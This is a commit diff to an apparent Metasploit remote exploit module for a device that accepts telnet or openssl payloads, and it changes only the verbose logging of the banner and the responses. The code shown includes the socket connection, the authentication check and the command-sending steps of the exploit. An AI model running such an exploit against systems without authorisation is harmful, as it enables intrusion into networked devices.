verbose response.
parent
4918e5856d
commit
829a7a53db
|
@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
attacker to execute arbitrary payloads with telnet or openssl.
|
||||
},
|
||||
'Author' => [
|
||||
'Mumbai', # https://github.com/realoriginal (module)
|
||||
'Mumbai', #
|
||||
'staaldraad', # https://twitter.com/_staaldraad/
|
||||
'Paul Haas <Paul [dot] Haas [at] Security-Assessment.com>', # took some of the code from polycom_hdx_auth_bypass
|
||||
'h00die <mike@shorebreaksecurity.com>' # stole the code, creds to them
|
||||
|
@ -73,7 +73,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
sock = connect
|
||||
Rex.sleep(2)
|
||||
banner = sock.get_once
|
||||
vprint_status("Received : #{banner}")
|
||||
vprint_status("Recieved #{banner.length} bytes from service")
|
||||
vprint_line("#{banner}")
|
||||
if banner =~ /password/
|
||||
print_status("Authentication enabled on device, authenticating with target...")
|
||||
if datastore['PASSWORD'].nil?
|
||||
|
@ -109,7 +110,9 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
sock.put(cmd)
|
||||
if datastore['VERBOSE']
|
||||
Rex.sleep(2)
|
||||
vprint_status(sock.get_once)
|
||||
resp = sock.get_once
|
||||
vprint_status("Recieved #{resp.length} bytes in response")
|
||||
vprint_line(resp)
|
||||
end
|
||||
|
||||
# Give time for our command to be queued and executed
|
||||
|
|
Loading…
Reference in New Issue